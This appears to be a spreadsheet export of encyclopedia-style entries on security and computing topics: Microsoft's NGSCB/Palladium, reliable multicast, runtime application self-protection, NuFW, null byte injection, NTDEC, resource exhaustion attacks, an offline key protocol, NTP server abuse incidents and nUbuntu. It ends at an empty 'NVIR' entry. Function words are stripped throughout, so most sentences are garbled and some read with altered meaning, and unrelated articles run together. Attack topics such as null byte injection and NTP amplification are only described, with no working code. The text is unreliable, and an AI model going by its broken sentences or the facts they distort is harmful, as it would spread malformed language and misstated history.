aspects available features bitlocker windows vista, measured boot windows certificate attestation windows 8.1, device guard windows history early development development ngscb began 1997 peter biddle conceived ways protect content personal computers. biddle enlisted assistance members microsoft research division core contributors eventually included blair dillaway, brian lamacchia, bryan willman, butler lampson, john detreville, john manferdelli, marcus peinado, paul england. adam barr, former microsoft employee worked secure remote boot feature development windows 2000 approached biddle colleagues tenure initiative tentatively known "trusted windows," aimed protect content copied. end, lampson proposed hypervisor execute limited operating system dedicated playback alongside windows 2000. patents operating system later filed 1999 england, detreville lampson; lampson noted patents ngscb. biddle colleagues realized 1999 ngscb applicable privacy security content protection, project formally given green-light microsoft october, 2001.during winhec 1999, biddle discussed intent create "trusted" architecture windows leverage hardware promote confidence security preserving backward compatibility previous software. october 1999, trusted computing platform alliance, consortium various technology companies including compaq, hewlett-packard, ibm, intel, microsoft formed effort promote personal computing confidence security. tcpa released detailed specifications trusted computing platform focus features code validation encryption based integrity measurements, hardware-based storage, machine authentication; features required hardware component designed tcpa called "trusted platform module" (referred "security support component", "security coprocessor", "security support processor" early ngscb documentation). winhec 2000, microsoft released technical presentation topics protection privacy, security, intellectual property titled "privacy, security, content windows platforms", focused turning windows "platform trust" computer security, user content, user privacy. notable presentation contention "there difference privacy protection, computer security, content protection"—"assurances trust must universally true". microsoft reiterated claims winhec 2001. ngscb intended protect forms content, unlike traditional rights management schemes focus protection audio tracks movies instead users potential protect made biddle's words, "egalitarian". "palladium" microsoft held first design review ngscb april 2002, approximately companies non-disclosure agreement. ngscb publicly unveiled codename "palladium" june 2002 article steven levy newsweek focused design, feature set, origin. levy briefly described potential features: access control, authentication, authorization, drm, encryption, well protection junk mail malware, example policies email accessible intended recipient microsoft word documents readable week creation; microsoft later release guide clarifying assertions hyperbolic; namely, ngscb would intrinsically enforce content protection, protect junk mail malware. instead, would provide platform developers could build solutions exist isolating applications store secrets them. microsoft sure whether "expose feature control panel present separate utility," ngscb would opt-in solution—disabled default.microsoft presspass later interviewed john manferdelli, restated expanded many points discussed article newsweek. manferdelli described evolutionary platform windows july, articulating "'palladium' require drm, require 'palladium'. microsoft sought group program manager august assist leading development several microsoft technologies including ngscb. paul otellini announced intel's support ngscb chipset, platform, processor codenamed "lagrande" intel developer forum 2002, would provide ngscb hardware foundation preserve backward compatibility previous software. ngscb ngscb known "palladium" january 2003 microsoft announced renamed "next-generation secure computing base." project manager mario juarez stated name chosen avoid legal action unnamed company acquired rights "palladium" name, well reflect microsoft's commitment ngscb upcoming decade. juarez acknowledged previous name controversial, denied changed microsoft dodge criticism.the trusted computing platform alliance superseded trusted computing group april 2003. principal goal consortium produce specification compatible ngscb; previous specification, meet requirements. designed compliance ngscb introduced many features platforms. first specification, revision released 2003.biddle emphasized june 2003 hardware vendors software developers vital ngscb. microsoft publicly demonstrated ngscb first time winhec 2003, protected data memory attacker; prevented access to—and alerted user of—an application changed; prevented remote administration tool capturing instant messaging conversation. despite microsoft's desire demonstrate ngscb hardware, software emulation required hardware components available. biddle reiterated ngscb evolutionary enhancements windows, basing assessment preserved backward compatibility employed concepts development, said capabilities scenarios would enable would revolutionary. microsoft also revealed multi-year roadmap ngscb, next major development milestone scheduled professional developers conference, indicating subsequent versions would ship concurrently pre-release builds windows vista; however, news reports suggested ngscb would integrated windows vista release, would instead made available separate software operating system.microsoft also announced details related adoption deployment ngscb winhec 2003, stating would create value proposition customers without significantly increasing cost computers; ngscb adoption year introductory release anticipated immediate support servers expected. last conference, biddle said ngscb needed provide users differentiate secured unsecured windows—that secure window "noticeably different" help protect users spoofing attacks; nvidia earliest announce feature. winhec 2003 represented important development milestone ngscb. microsoft dedicated several hours presentations released many technical whitepapers, companies including atmel, comodo group, fujitsu, safenet produced preliminary hardware demonstration. microsoft also demonstrated ngscb several u.s. campuses california york june 2003. ngscb among topics discussed microsoft's 2003 pre-beta software development kit, known developer preview, distributed attendees. developer preview first time microsoft made ngscb code available developer community offered company educational opportunity ngscb software development. with release, microsoft stated primarily focused supporting business enterprise applications scenarios first version ngscb scheduled ship windows vista, adding intended address consumers subsequent version technology, provide estimated time delivery version. conference, allchin said microsoft continuing work hardware vendors would able support technology, bill gates expected generation central processing units offer full support. following 2003, ngscb demonstrated prototype hardware annual security conference november.microsoft announced winhec 2004 would revise nscb response feedback customers independent software vendors desire rewrite existing programs order benefit functionality; revision would also provide direct support windows protected environments operating system, components, applications, instead environment applications. ngscb secure input feature would also undergo significant revision based cost assessments, hardware requirements, usability issues previous implementation. there subsequent reports microsoft would cease developing ngscb; microsoft denied reports reaffirmed commitment delivery. additional reports published later year suggested microsoft would make even additional changes based feedback industry.microsoft's absence continual updates ngscb progress 2005 caused industry insiders speculate ngscb cancelled. microsoft management summit event, steve ballmer said company would build security foundation started ngscb create virtualization technologies windows, later hyper-v. reports winhec 2005 indicated microsoft scaled back plans ngscb, could ship windows vista—which already beset numerous delays even "development reset"—within reasonable timeframe; instead isolating components, ngscb would offer "secure startup" ("bitlocker drive encryption") encrypt disk volumes validate pre-boot firmware operating system components. microsoft intended deliver aspects ngscb later. allchin stated ngscb would "marry hardware software gain better security", instrumental development bitlocker. architecture technical details complete microsoft-based trusted computing-enabled system consist software components developed microsoft also hardware components developed trusted computing group. majority features introduced ngscb heavily reliant specialized hardware operate predating 2004. current trusted computing specifications, hardware components: trusted platform module (tpm), provide secure storage cryptographic keys secure cryptographic co-processor, curtained memory feature central processing unit (cpu). ngscb, software components, nexus, security kernel part operating system provides secure environment (nexus mode) trusted code nexus computing agents (ncas), trusted modules nexus mode within ngscb-enabled applications. secure storage attestation time manufacture, cryptographic generated stored within tpm. this never transmitted component, designed extremely difficult retrieve stored reverse engineering method, even owner. applications pass data encrypted decrypted tpm, certain strict conditions. specifically, decrypted data ever passed authenticated, trusted applications, ever stored curtained memory, making inaccessible applications operating system. although store single cryptographic securely, secure storage arbitrary data extension possible encrypting data decrypted using securely stored key. also able produce cryptographic signature based hidden key. this signature verified user third party, therefore used provide remote attestation computer secure state. curtained memory ngscb also relies curtained memory feature provided cpu. data within curtained memory accessed application belongs, application operating system. attestation features tpm(trusted platform module) used confirm trusted application genuinely running curtained memory; therefore difficult anyone, including owner, trick trusted application running outside curtained memory. this turn makes reverse engineering trusted application extremely difficult. applications ngscb-enabled applications split distinct parts, nca, trusted module access limited application programming interface (api), untrusted portion, access full windows api. code deals ngscb functions must located within nca. reason split windows developed many years result extremely complex difficult audit security bugs. maximize security, trusted code required smaller, carefully audited api. where security paramount, full available. uses scenarios ngscb enables categories applications scenarios. examples uses cited microsoft include decentralized access control policies; digital rights management services consumers, content providers, enterprises; protected instant messaging conversations online transactions; secure forms machine health compliance, network authentication, remote access. ngscb-secured virtual private network access earliest scenarios envisaged microsoft. ngscb also strengthen software update mechanisms belonging antivirus software windows update.an early ngscb privacy scenario conceived microsoft "wine purchase scenario," user safely conduct transaction online merchant without divulging personally identifiable information transaction. with release ngscb developer preview 2003, microsoft emphasized following enterprise applications scenarios: document signing, secured data viewing, secured instant messaging, secured plug-ins emailing. "the concept machine identity actually gives ability things like strengthen antivirus updates start creating circumstances sort create little secure partition, secure space within things like work around rootkits. [...] happening arms race security today attempt subvert operating system operating system longer behaving manner either designed user wants—without user knowing—right? cases, creating fake user things behalf—which really behalf: spends money, gives away data, gives away personally identifiable information. anything lets create stronger, immutable identity combination like: "this machine, software, operating system, service, user" something benefit users things work chiseling spaces less effective." winhec 2004 scenarios during winhec 2004, microsoft revealed features based revision ngscb, cornerstone code integrity rooting: cornerstone would protect user's login authentication information securely transmitting ngscb-protected windows components validation, finalizing user authentication process releasing access syskey validation successful. intended protect data laptops lost stolen prevent hackers thieves accessing even performed software-based attack booted alternative operating system. code integrity rooting would validate boot system files prior startup microsoft windows. validation components failed, syskey would released.bitlocker combination features; "cornerstone" codename bitlocker, bitlocker validates pre-boot firmware operating system components boot, protects syskey unauthorized access; unsuccessful validation prohibits access protected system. reception reaction ngscb unveiling newsweek largely negative. while security features praised, critics contended ngscb could used impose restrictions users; lock-out competing software vendors; undermine fair rights open source software linux. microsoft's characterization ngscb security technology subject criticism origin focused drm. ngscb's announcement occurred years microsoft accused anticompetitive practices united states microsoft corporation antitrust case, detail called company's intentions technology question—ngscb regarded effort company maintain dominance personal computing industry. notion "trusted windows" architecture—one implied windows untrustworthy—would also source contention within company itself.after ngscb's unveiling, microsoft drew frequent comparisons brother, oppressive dictator totalitarian state george orwell's dystopian novel nineteen eighty-four. electronic privacy information center legislative counsel, chris hoofnagle, described microsoft's characterization ngscb "orwellian." brother awards bestowed microsoft award ngscb. bill gates addressed comments homeland security conference stating ngscb "can make country secure prevent nightmare vision george orwell time." steven levy—the author unveiled existence ngscb—claimed 2004 front-page article newsweek ngscb could eventually lead "information infrastructure encourages censorship, surveillance, suppression creative impulse anonymity outlawed every penny spent accounted for." however, microsoft outlined scenario enabled ngscb allows user conduct transaction without divulging personally identifiable information.ross anderson cambridge university among vocal critics ngscb trusted computing. anderson alleged technologies designed satisfy federal agency requirements; enable content providers third-parties remotely monitor delete data users' machines; certificate revocation lists ensure content deemed "legitimate" could copied; unique identifiers revoke validate files; compared attempts soviet union "register control typewriters machines." anderson also claimed could control execution applications user's machine and, this, bestowed derisive "fritz chip" name reference united states senator ernest "fritz" hollings, recently proposed legislation consumer broadband digital television promotion consumer electronic devices. anderson's report referenced extensively news media appeared publications news, york times, register. david safford research stated anderson presented several technical errors within report, namely proposed capabilities exist within specification many beyond scope trusted platform design. anderson later alleged bitlocker designed facilitate lock competing software encrypted system, and, spite allegation ngscb designed federal agencies, advocated microsoft backdoor bitlocker. similar sentiments expressed richard stallman, founder project free software foundation, alleged trusted computing technologies designed enforce prevent users running unlicensed software. 2015, stallman stated "the proved total failure" "there reasons think feasible drm." after release anderson's report, microsoft stated ngscb "enhancements windows ngscb architecture mechanism filtering content, provide mechanism proactively searching internet 'illegal' content [...] microsoft firmly opposed putting 'policing functions' nexus-aware intend idea direct opposition design goals forth ngscb, "built premise policy imposed approved user." concerns ngscb also raised would essentially unique machine identifiers, drew comparisons intel pentium processor serial number, unique hardware identification number 1990s viewed risk end-user privacy. ngscb, however, mandates disclosure keys provided based solely user discretion; contrast, intel's pentium included unique serial number could potentially revealed application. ngscb, also unlike intel's pentium iii, would provide optional features allow users indirectly identify external requestors.in response concerns ngscb would take control away users sake content providers, bill gates stated latter "provide content easily accessible forms else ends encouraging piracy." bryan willman, marcus peinado, paul england, peter biddle—four ngscb engineers—realized early development ngscb would ultimately fail efforts prevent piracy. 2002, group released paper titled "the darknet future content distribution" outlined content protection mechanisms demonstrably futile. paper's premise circulated within microsoft late 1990s source controversy within microsoft; biddle stated company almost terminated employment result paper's release. 2003 report published harvard university researchers suggested ngscb similar technologies could facilitate secure distribution copyrighted content across peer-to-peer networks.not assessments negative. paul thurrott praised ngscb, stating "microsoft's trustworthy computing initiative made real" would "form basis next-generation computer systems." scott bekker redmond magazine stated ngscb misunderstood controversy appeared "promising, user-controlled defense privacy intrusions security violations." february 2004, in-stat/mdr, publisher microprocessor report, bestowed ngscb best technology award. malcom crompton, australian privacy commissioner, stated "ngscb great privacy enhancing potential [...] microsoft recognised privacy issue [...] work them, give benefit doubt urge right thing." when microsoft announced winhec 2004 would revising ngscb previous applications would rewritten, martin reynolds gartner praised company decision would create "more sophisticated" version ngscb would simplify development. david wilson, writing south china morning post, defended ngscb saying "attacking latest microsoft monster international blood sport" "even microsoft technology capable ending third world hunger first world obesity, digital seers would still lambaste view bill gates grey incarnation satan." microsoft noted negative reaction ngscb gradually waned events usenix annual technical conference 2003, several fortune companies also expressed interest it.when reports announced 2005 microsoft would scale back plans incorporate bitlocker windows vista, concerns pertaining erosion user rights, vendor lock-in, potential abuses remained. 2008, biddle stated negative perception significant contributing factor responsible cessation ngscb's development. vulnerability article 2003, boneh brumley indicated projects like ngscb vulnerable timing attacks. also microsoft pluton secure boot intel lagrande trusted computing trusted platform module intel management engine references external links microsoft's ngscb home page (archived 2006-07-05) trusted computing group home page system integrity team blog team blog ngscb technologies (archived 2008-10-21) security providers reference msdn, including bitlocker drive encryption trusted platform module (both components ngscb) base services msdn microsoft's "digital rights management operating system" patent development considerations nexus computing agents</t>
  </si>
  <si>
    <t>Reliable multicast</t>
  </si>
  <si>
    <t>reliable multicast computer networking protocol provides reliable sequence packets multiple recipients simultaneously, making suitable applications multi-receiver file transfer. overview multicast network addressing method delivery information group destinations simultaneously using efficient strategy deliver messages link network once, creating copies links multiple destinations split (typically network switches routers). however, like user datagram protocol, multicast guarantee delivery message stream. messages dropped, delivered multiple times, delivered order. reliable multicast protocol adds ability receivers detect lost and/or out-of-order messages take corrective action (similar principle tcp), resulting gap-free, in-order message stream. reliability exact meaning reliability depends specific protocol instance. minimal definition reliable multicast eventual delivery data group members, without enforcing particular delivery order. however, reliable multicast protocols ensure level reliability; many trade efficiency reliability, different ways. example, makes sender responsible transmission reliability, multicast nak-based protocols shift responsibility receivers: sender never knows sure receivers fact received data. rfc- 2887 explores design space bulk data transfer, brief discussion various issues hints possible different meanings reliable. reliable group data delivery reliable group data delivery (rgdd) form multicasting object moved single source fixed receivers known transmission begins. variety applications need delivery: hadoop distributed file system (hdfs) replicates chunk data additional times specific servers, replication multiple servers required scale applications data replication multiple servers necessary load balancing allowing multiple servers serve data local cached copies. such delivery frequent within datacenters plethora servers communicating running highly distributed applications. rgdd also occur across datacenters sometimes referred inter-datacenter point multipoint (p2mp) transfers. such transfers deliver huge volumes data datacenter multiple datacenters various applications: search engines distribute search index updates periodically (e.g. every hours), social media applications push content many cache locations across world (e.g. youtube facebook), backup services make several geographically dispersed copies increased fault tolerance. maximize bandwidth utilization reduce completion times bulk transfers, variety techniques proposed selection multicast forwarding trees. virtual synchrony modern systems like spread toolkit, quicksilver, corosync achieve data rates 10,000 multicasts second more, scale large networks huge numbers groups processes. most distributed computing platforms support models. example, widely supported object-oriented corba platforms support transactions corba products support transactional replication one-copy-serializability model. "corba fault tolerant objects standard" based virtual synchrony model. virtual synchrony also used developing york stock exchange fault-tolerance architecture, french traffic control system, navy aegis system, ibm's business process replication architecture websphere microsoft's windows clustering architecture windows longhorn enterprise servers. systems support virtual synchrony virtual synchrony first supported cornell university called "isis toolkit". cornell's current version, vsync released 2013 name isis2 (the name changed isis2 vsync 2015 wake terrorist attack paris extremist organization called isis), periodic updates revisions since time. current stable release v2.2.2020; released november 2015; v2.2.2048 release currently available beta form. vsync aims massive data centers support cloud computing. other systems include horus system transis system, totem system, system called phoenix, distributed security management system called rampart, "ensemble system", quicksilver system, "the openais project", derivative corosync cluster engine number products (including microsoft ones mentioned earlier). other existing proposed protocols pragmatic general multicast (pgm) tibco software's trdp (part rv). note: tibco acquired talarian, inherited implementation smartsockets (smartpgm). trdp pre-dates development smartpgm opendds open source implementation since 0.12 release scalable reliable multicast (srm) quicksilver scalable multicast (qsm) smart multicast (secure multicast advanced repeating television) reliable stream protocol (rsp), high-performance open source protocol compute clusters tipc communication groups library support jgroups (java api): popular project/implementation spread: c/c++ api, java api) hmbdc open source (headers only) middleware, ultra-low latency/high throughput, scalable reliable inter-thread, network messaging references further reading reliable distributed systems: technologies, services applications. k.p. birman. springer verlag (1997). textbook, covers broad spectrum distributed computing concepts, including virtual synchrony. distributed systems: principles paradigms (2nd edition). andrew tanenbaum, maarten steen (2002). textbook, covers broad spectrum distributed computing concepts, including virtual synchrony. "the process group approach reliable distributed computing". k.p. birman, communications 16:12 (dec. 1993). written non-experts. "group communication specifications: comprehensive study" gregory chockler, idit keidar, roman vitenberg. computing surveys 33:4 (2001). introduces mathematical formalism kinds models, uses compare expressive power failure detection assumptions. "the part-time parliament". leslie lamport. transactions computing systems (tocs), 16:2 (1998). introduces paxos implementation replicated state machines. "exploiting virtual synchrony distributed systems". k.p. birman joseph. proceedings 11th symposium operating systems principles (sosp), austin texas, nov. 1987. earliest term, probably best exposition topic.</t>
  </si>
  <si>
    <t>Runtime application self-protection</t>
  </si>
  <si>
    <t>runtime application self-protection (rasp) security technology uses runtime instrumentation detect block computer attacks taking advantage information inside running software. technology differs perimeter-based protections firewalls, detect block attacks using network information without contextual awareness. rasp technology said improve security software monitoring inputs, blocking could allow attacks, protecting runtime environment unwanted changes tampering. rasp-protected applications rely less external devices like firewalls provide runtime security protection. when threat detected rasp prevent exploitation possibly take actions, including terminating user's session, shutting application down, alerting security personnel sending warning user. rasp aims close left application security testing network perimeter controls, neither enough insight real-time data event flows either prevent vulnerabilities slipping review process block threats unforeseen development. implementation rasp integrated framework module runs conjunction program's codes, libraries system calls. technology also implemented virtualization. rasp similar interactive application security testing (iast), difference iast focused identifying vulnerabilities within applications rasps focused protecting cybersecurity attacks take advantages vulnerabilities attack vectors. deployment options rasp solutions deployed different ways: monitor protection mode. monitor mode, rasp solution reports application attacks block attack. protection mode, rasp solution reports blocks application attacks. also runtime verification runtime error detection dynamic program analysis references</t>
  </si>
  <si>
    <t>NuFW</t>
  </si>
  <si>
    <t>nufw software package extends netfilter, linux kernel-internal packet filtering firewall module. nufw adds authentication filtering rules. nufw also provided hardware firewall, edenwall firewalling appliance. nufw restarted renamed ufwi. introduction nufw ufwi extension netfilter brings notion user filtering. nufw ufwi authenticate connection goes gateway from/to chosen subset specific protocol (iptables used select connections authenticate). perform accounting, routing quality service (qos) based users simply ips. filter packets criteria application used distant users. secure simple single sign system. principles nufw ufwi refuses idea user address easily spoofed. thus uses algorithm perform authentication. depends subsystems: nufw connected netfilter nuauth connected clients nufw. algorithm following: standard application sends packet. nufw client sees connection initiated sends user request packet. nufw server queues packet sends auth request packet nuauth server. nuauth server sums auth request user request packet checks authentication authority. nuauth server sends answer back nufw server nufw server transmits packet following answer given request.this algorithm realizes posteriori authentication connection. time-based association, ensures identity user sent packet. nufw real authentication firewall, never associates user machine. awards 2007 lutèce d'or (paris, france), best innovation 2005 trophées libre (soissons, france), security external links ufwi website nufw website netfilter website nuapplet client nufw</t>
  </si>
  <si>
    <t>Null byte injection</t>
  </si>
  <si>
    <t>null character (also null terminator) control character value zero. present many character sets, including defined baudot ita2 codes, iso/iec ascii), control code, universal coded character unicode), ebcdic. available nearly mainstream programming languages. often abbreviated null, though contexts term used null pointer). 8-bit codes, known null byte. original meaning character like nop—when sent printer terminal, effect (some terminals, however, incorrectly display space). when electromechanical teleprinters used computer output devices, null characters sent printed line allow time mechanism return first printing position next line. punched tape, character represented holes all, unpunched tape initially filled null characters, often text could inserted reserved space null characters punching characters tape nulls. today character much significance programming language derivatives many data formats, serves reserved character used signify string, often called null-terminated string. this allows string length overhead byte; alternative storing count requires either string length limit overhead byte (there advantages/disadvantages described null-terminated string article). representation null character often represented escape sequence source code string literals character constants. many languages (such introduced notation), separate escape sequence, octal escape sequence single octal digit consequence, must followed digits otherwise interpreted start longer octal escape sequence. other escape sequences found various languages \000, \x00, \u0000. null character placed percent code %00. ability represent null character always mean resulting string correctly interpreted, many programs consider null string. thus ability type case unchecked user input) creates vulnerability known null byte injection lead security exploits.in caret notation null character keyboards, enter null character holding ctrl pressing layouts ctrl+2 often work, need shift sign). documentation, null character sometimes represented single-em-width symbol containing letters "nul". unicode, character corresponding glyph visual representation null character, symbol null, u+2400 (␀)—not confused actual null character, u+0000. encoding modern character sets, null character code point value zero. encodings, translated single code unit zero value. instance, utf-8 single zero byte. however, modified utf-8 null character encoded bytes: 0xc0, 0x80. this allows byte value zero, used character, used string terminator. references external links null byte injection wasc threat classification null byte attack section poison null byte introduction introduction nullify byte attack</t>
  </si>
  <si>
    <t>NTDEC</t>
  </si>
  <si>
    <t>ntdec (whose full name nintendo electronic (chinese: 任天堂電子有限公司)), taiwanese manufacturer cartridges, accessories original games famicom. also manufactured converters play famicom titles nes. company founded 1983 (according asder official website), 80's activities still today unknown. ntdec gained notoriety early 1990s large-scale piracy nintendo entertainment system games along unauthorized nintendo trademark. this arrest employees discontinuation ntdec line. history copyright infringement ntdec produced large number unlicensed video game copies 1989 1991, sold asia united states mail order. unusual among counterfeit cartridge manufacturers, they're often identifiable company logo in-game copyright notice modified read "ntdec", well rear label featuring green "quality guaranty" [sic] stripe. nintendo america, inc. ntdec ntdec employees arrested 1991 company's activities distributing cartridges legal action brought company nintendo shortly copyright infringement, well "nintendo" trademark company name.nintendo's legal action 1991 concluded 1993 nintendo awarded $24,059,062 plus attorneys fees $108,829.00 costs $709.80, worldwide permanent injunction preventing ntdec infringing nintendo's intellectual property rights. point company ceased operations ntdec name. original games between 1991 1993, ntdec developed published number original games asia, distributed parts south america europe. many credited mega soft, california-based company listed nintendo america, inc. ntdec north american distribution arm. games previously released 1991 compiled caltron multicart 1992, distributed united states since cartridge contains ntdec/mega soft games carries cn-xx previous original ntdec games; caltron caltron ind. inc.) believed company ntdec. list titles ntdec list titles mega soft list titles caltron unreleased titles dragon palace adventure pearl turn caltron 9-in-1 asder following legal action 1993, company appears ceased operations ntdec name. another taiwanese company, asder electronic co., (chinese: 亞斯德科技有限公司), released educational computer systems game joypads containing mega soft games, several original famicom games continuing ntdec's cn-xx numbering. however, unknown whether company ntdec name, separate company obtained rights past titles them. list games note: title master shooter, included asder 20-in-1, hack game name (listed compilation shooter: part1). references external links asder caltron</t>
  </si>
  <si>
    <t>Resource exhaustion attack</t>
  </si>
  <si>
    <t>resource exhaustion attacks computer security exploits crash, hang, otherwise interfere targeted program system. they form denial-of-service attack different distributed denial-of-service attacks, involve overwhelming network host server requests many locations. attack vectors resource exhaustion attacks generally exploit software design deficiency. software manual memory management (most commonly written c++), memory leaks common exploited resource exhaustion. even garbage collected programming language used, resource exhaustion attacks possible program uses memory inefficiently impose limits amount state used necessary. file descriptor leaks another common vector. most general-purpose programming languages require programmer explicitly close file descriptors, even particularly high-level languages allow programmer make mistakes. types examples billion laughs fork bomb infinite loop local area network denial (land) pentium f00f ping death regular expression denial service (redos) references external links owasp's wiki article resource exhaustion daniel bernstein resource exhaustion</t>
  </si>
  <si>
    <t>Offline private key protocol</t>
  </si>
  <si>
    <t>offline private protocol (opkp) cryptographic protocol prevent unauthorized access back archive data. protocol results public used encrypt data offline private later used decrypt data. protocol based three rules regarding key. offline private should: stored encrypted data (obviously) kept organisation physically stores encrypted data, ensure privacy stored system original data, avoid possibility theft private would give access data storage provider; avoid would needed restore backup, would lost together data loss made restore necessary first placeto comply rules, offline private protocol uses method asymmetric wrapping. security protocol provide rules strength encryption methods keys used, security protocol depends actual cryptographic implementation. when used combination strong encryption methods, protocol provide extreme security. operation initially: client program (program) system (local system) data back archive generates random private priv program creates public based priv program stores local system program presents priv user store key, e.g. printed trusted paper key, memory card program destroys priv local systemwhen archiving creating backup, session file: program generates one-time random otrk program encrypts data using otrk symmetric encryption method program encrypts (optionally padded) otrk using otrkcr program stores otrkcr encrypted data server program destroys otrk local system program destroys otrkcr local system server stores otrkcr stores encrypted datato restore backed archived data: user feeds priv program program downloads data respective otrkcr program decrypts otrkcr using priv, giving otrk program decrypts data using otrk program destroys priv local system references</t>
  </si>
  <si>
    <t>NTP server misuse and abuse</t>
  </si>
  <si>
    <t>server misuse abuse covers number practices cause damage degradation network time protocol (ntp) server, ranging flooding traffic (effectively ddos attack) violating server's access policy rules engagement. incident branded vandalism open letter poul-henning kamp router manufacturer d-link 2006. this term later extended others retroactively include incidents. there however, evidence problems deliberate vandalism. they usually caused shortsighted poorly chosen default configurations. deliberate form server abuse came note 2013, servers used part amplification denial-of-service attacks. some servers would respond single "monlist" request packet, packets describing associations. using request spoofed address attackers could direct amplified stream packets network. this resulted largest distributed denial-of-service attacks known time. common client problems troublesome problems involved server addresses hardcoded firmware consumer networking devices. major manufacturers oems produced hundreds thousands devices using coupled customers almost never upgrading firmware devices, query storms problems persist long devices service. particularly common software error generate query packets short (less five second) intervals response received when placed behind aggressive firewalls block server responses, implementation leads never-ending stream client requests variously blocked servers. such over-eager clients (particularly polling second) commonly make traffic public servers, despite minuscule fraction total clients.while might technically reasonable send initial packets short intervals, essential health network client connection re-attempts generated logarithmically exponentially decreasing rates prevent denial service. this protocol exponential logarithmic backdown applies connectionless protocol, extension many portions connection-based protocols. examples backing method found specification connection establishment, zero-window probing, keepalive transmissions. notable cases tardis trinity college, dublin october 2002, earliest known cases time server misuse resulted problems server trinity college, dublin. traffic ultimately traced misbehaving copies program called tardis thousands copies around world contacting server obtaining timestamp http. ultimately, solution modify server configuration deliver customized version home page (greatly reduced size) return bogus time value, caused clients choose different time server. updated version tardis later released correct problem. netgear university wisconsin–madison first widely known case server problems began 2003, netgear's hardware products flooded university wisconsin–madison's server requests. university personnel initially assumed malicious distributed denial service attack took actions block flood network border. rather abating ddos attacks flow increased, reaching 250,000 packets-per-second (150 megabits second) june. subsequent investigation revealed four models netgear routers source problem. found sntp (simple ntp) client routers serious flaws. first, relies single server university wisconsin–madison) whose address hard-coded firmware. second, polls server second intervals receives response. total 707,147 products faulty client produced. netgear released firmware updates affected products (dg814, hr314, mr814 rp614) query netgear's servers, poll every minutes, give five failures. while update fixes flaws original sntp client, solve larger problem. most consumers never update router's firmware, particularly device seems operating properly. university wisconsin–madison server continues receive high levels traffic netgear routers, occasional floods 100,000 packets-per-second. netgear donated $375,000 university wisconsin–madison's division information technology help identifying flaw. csiro also 2003, another case forced servers australian commonwealth scientific industrial research organisation's (csiro) national measurement laboratory close public. traffic shown come implementation router models address csiro server embedded firmware. released firmware updates products: 7004vbr 7004vwbr models known affected. d-link poul-henning kamp 2005 poul-henning kamp, manager danish stratum server available general public, observed huge rise traffic discovered originating d-link's router products. stratum servers receive time signal accurate external source, receiver, radio clock, calibrated atomic clock. convention, stratum time servers used applications requiring extremely precise time measurements, scientific applications stratum servers large number clients. home networking router meet either criteria. addition, kamp's server's access policy explicitly limited servers directly connected danish internet exchange (dix). direct stratum servers d-link's routers resulted huge rise traffic, increasing bandwidth costs server load. many countries, official timekeeping services provided government agency (such nist u.s.). since danish equivalent, kamp provides time service "pro bono publico". return, agreed provide free connection time server assumption bandwidth involved would relatively low, given limited number servers potential clients. with increased traffic caused d-link routers, requested yearly connection 54,000 (approximately us$9,920 €7,230). kamp contacted d-link november 2005, hoping problem compensate time money spent tracking problem bandwidth charges caused d-link products. company denied problem, accused extortion, offered amount compensation kamp asserted cover expenses. april 2006, kamp posted story website. story picked slashdot, reddit news sites. after going public, kamp realized d-link routers directly querying stratum time servers, violating access policies least process. april 2006, d-link kamp announced "amicably resolved" dispute. providers swisstime.ethz.ch years zurich provided open access time server swisstime.ethz.ch operational time synchronization. excessive bandwidth usage, averaging upwards day, become necessary direct external usage public time server pools, ch.pool.ntp.org. misuse, caused mostly it-providers synchronizing client infrastructures, made unusually high demands network traffic, thereby causing take effective measures. fall 2012, availability swisstime.ethz.ch changed closed access. since beginning july 2013, access server blocked entirely protocol. snapchat december 2016, operator community ntppool.org noticed significant increase traffic, starting december 13.investigation showed snapchat application running prone querying servers hardcoded third party library, request snapchat-owned domain followed request flood. after snap inc. contacted, developers resolved problem within hours notification update application. apology assist dealing load generated, snap also contributed timeservers australia south america pools.as positive side effect, library used open source, error-prone default settings improved feedback community. connectivity testing tp-link wi‑fi extenders firmware tp-link wi‑fi extenders 2016 2017 hardcoded five servers, including fukuoka university japan australia zealand server pools, would repeatedly issue request five requests every five seconds consuming 0.72 month device. excessive requests misused power internet connectivity check displayed device's connectivity status administration interface.the issue acknowledged tp-link's branch japan pushed company redesign connectivity test issue firmware updates addressing issue affected devices. affected devices unlikely install firmware wifi extenders tp-link install firmware updates automatically, notify owner firmware update availability. tp-link firmware update availability also varies country, even though issue affects wifi range extenders sold globally.the servers fukuoka university reported shut sometime february april 2018, removed public time server lists. technical solutions after incidents, became clear apart stating server's access policy, technical means enforcing policy needed. mechanism provided extending semantics reference identifier field packet stratum field january 2006, 4330 published, updating details sntp protocol, also provisionally clarifying extending related protocol areas. sections 4330 particular relevance topic (the kiss-o'-death packet, being good network citizen, best practices, security considerations). section introduces kiss-o'-death packets: ntpv4 sntpv4, packets kind called kiss-o'-death (kod) packets, ascii messages convey called kiss codes. packets name early tell clients stop sending packets violate server access controls. requirements protocol work retroactively, clients implementations earlier version protocol recognize time good technical means counteract misuse servers. 2015, possible attacks network time protocol, network time security (internet draft draft-ietf-ntp-using-nts-for-ntp-19) proposed using transport layer security implementation. june 2019 cloudflare started trial service around world, based previous internet draft. references external links trinity college incident smc/csiro incident poul-henning kamp's open letter d-link (changed april 2006) copy poul-henning kamp's original letter d-link (from april 2006) when firmware attacks! (ddos d-link) richard clayton osnews' article "ntp vandalism" engadget "ntp vandalism" fortigate bug: firewalls sending excessive requests pool timesyncd bug: limit rate requests</t>
  </si>
  <si>
    <t>NUbuntu</t>
  </si>
  <si>
    <t>nubuntu network ubuntu project take existing ubuntu operating system livecd full installer remaster tools needed penetration testing servers networks. main idea keep ubuntu's ease popular penetration testing tools. besides usage network server testing, nubuntu made desktop distribution advanced linux users. contents nubuntu uses light window manager fluxbox. includes used security programs linux, wireshark, nmap, dsniff, ettercap. history 2005-12-18 nubuntu project born, developers release testing 2006-01-16 nubuntu live developers release stable 2006-06-26 nubuntu live developers release version 6.06 2006-10-16 nubuntu featured hacker japan, japanese hacker magazine 2006-11-21 nubuntu live developers release version 6.10 april 2010, official website closed explanation. releases below list previous current releases. further reading russ mcree (nov 2007) security testing nubuntu, linux magazine, issue external links</t>
  </si>
  <si>
    <t>NVIR</t>
  </si>
  <si>
